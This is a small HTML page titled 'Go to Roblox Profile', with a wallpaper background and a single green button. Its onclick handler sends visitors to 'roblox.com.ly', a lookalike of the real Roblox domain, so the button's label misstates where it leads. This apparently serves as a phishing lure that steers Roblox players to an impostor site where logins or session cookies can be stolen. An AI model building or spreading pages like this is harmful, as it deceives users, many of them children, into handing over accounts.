<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Go to Roblox Profile</title>
    <style>
      body {
        background-image: url("https://w0.peakpx.com/wallpaper/481/998/HD-wallpaper-moon-fox-galaxy-fox-artist-artwork-digital-art-deviantart-minimalism-minimalist.jpg");
        background-size: cover;
        background-repeat: no-repeat;
      }

      #button {
        margin-top: 50px;
        display: flex;
        justify-content: center;
        align-items: center;
        width: 200px;
        height: 50px;
        background-color: #4CAF50;
        color: white;
        font-size: 16px;
        border-radius: 25px;
        border: none;
        cursor: pointer;
      }

      #button:hover {
        background-color: #3e8e41;
      }
    </style>
  </head>
  <body>
    <div>
      <button id="button" onclick="window.location.href = 'https://roblox.com.ly/users/4295587487/profile#!/creations';">Go to Roblox Profile</button>
    </div>
  </body>
</html>
